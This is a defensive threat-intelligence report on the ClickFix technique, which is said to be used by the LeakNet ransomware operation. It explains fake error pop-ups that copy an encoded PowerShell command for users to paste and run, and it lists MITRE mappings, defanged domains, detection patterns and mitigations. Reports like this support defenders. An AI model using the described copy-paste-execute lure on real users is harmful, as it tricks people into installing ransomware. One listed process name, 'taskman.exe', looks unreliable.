Full Report
The ransomware operation known as LeakNet has adopted the ClickFix social engineering tactic delivered through compromised websites as an initial access method. The use of ClickFix, where users are tricked into manually running malicious commands to address non-existent errors, is a departure from relying on traditional methods for obtaining initial access, such as through stolen credentials
Analysis Summary
# Tool/Technique: ClickFix (LeakNet Variant)
## Overview
ClickFix is a sophisticated social engineering technique that leverages compromised websites to display fake browser/software error messages. It tricks users into manually executing malicious PowerShell commands under the guise of "fixing" a non-existent technical issue. Recently, the **LeakNet** ransomware operation has adopted this method to bypass traditional email filters and automated sandbox detection.
## Technical Details
- **Type**: Social Engineering Technique / Initial Access Vector
- **Platform**: Windows (primarily targets web browser users)
- **Capabilities**: Bypassing Mark-of-the-Web (MotW), delivery of second-stage payloads (infostealers/ransomware), and evasion of automated document scanning.
- **First Seen**: ClickFix methodology emerged in early 2024; adoption by LeakNet documented in late 2024.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566.002 - Phishing: Spearphishing Link
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1204.001 - User Execution: Malicious Link
- T1204.002 - User Execution: Malicious File
- **TA0005 - Defense Evasion**
- T1132 - Data Encoding (Base64 encoding of clipboard commands)
- T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass (via manual clipboard execution)
## Functionality
### Core Capabilities
- **Web Overlay Injection**: Compromised websites display high-quality, localized pop-ups (e.g., Google Chrome "Update Error" or MS Word "Font Not Found").
- **Clipboard Hijacking**: The "Fix" button copies a Base64-encoded PowerShell command to the user's clipboard.
- **Manual Execution Induction**: Instructs the user to open a terminal (Win+R -> `cmd` or `powershell`) and paste the content to execute the "patch."
### Advanced Features
- **Evasion of Secure Email Gateways (SEGs)**: Because the initial vector is a compromised legitimate site rather than a malicious attachment, it bypasses standard email security.
- **Bypassing Sandbox Analysis**: Automated sandboxes often fail to trigger the payload because it requires complex human interaction (copy-pasting and manual terminal entry).
## Indicators of Compromise
*Note: Specific indicators vary per campaign; the following are behavioral and structural patterns associated with ClickFix/LeakNet.*
- **File Names**: `Fix.ps1`, `update.bat`, `Patch.exe`
- **Network Indicators**:
- `leaknet[.]xyz` (Defanged)
- `clonercaptcha[.]com` (Defanged - Common ClickFix infrastructure)
- `api[.]organic-fresh[.]news` (Defanged)
- **Behavioral Indicators**:
- `powershell.exe` spawned from `cmd.exe` containing `[System.Convert]::FromBase64String`.
- Unexpected use of `mshta.exe` or `curl` via manual command line entry by non-administrative users.
## Associated Threat Actors
- **LeakNet** (Ransomware-as-a-Service)
- **Storm-1679** (Initial access broker known for using similar lures)
## Detection Methods
- **Behavioral Detection**: Monitor for command-line arguments involving `Set-Clipboard` or execution of encoded PowerShell commands initiated by `explorer.exe` or `taskman.exe` (manual user input).
- **Endpoint Monitoring**: Alert on users opening "Run" dialogs or PowerShell immediately after visiting compromised/suspicious domains.
- **Web Content Filtering**: Use URL filtering to block known "ClickFix" infrastructure domains and sites flagged for script injection.
## Mitigation Strategies
- **Prevention**: Implement a robust Web Content Filter to block access to newly registered domains and known compromised sites.
- **Hardening**: Disable PowerShell for non-privileged users or enforce **Constrained Language Mode**.
- **User Education**: Train staff specifically on the "Copy-Paste-Execute" lure, emphasizing that legitimate software updates never require manual command-line execution from a web pop-up.
- **Attack Surface Reduction**: Block the execution of commonly abused binaries like `mshta.exe` and `scrcons.exe` if not required for business operations.
## Related Tools/Techniques
- **ClearFake**: A similar social engineering framework using fake browser updates.
- **EtherHiding**: Uses blockchain (BSC) to host malicious code that triggers similar site overlays.
- **SocGholish**: A long-standing framework for delivering malware via fake software updates.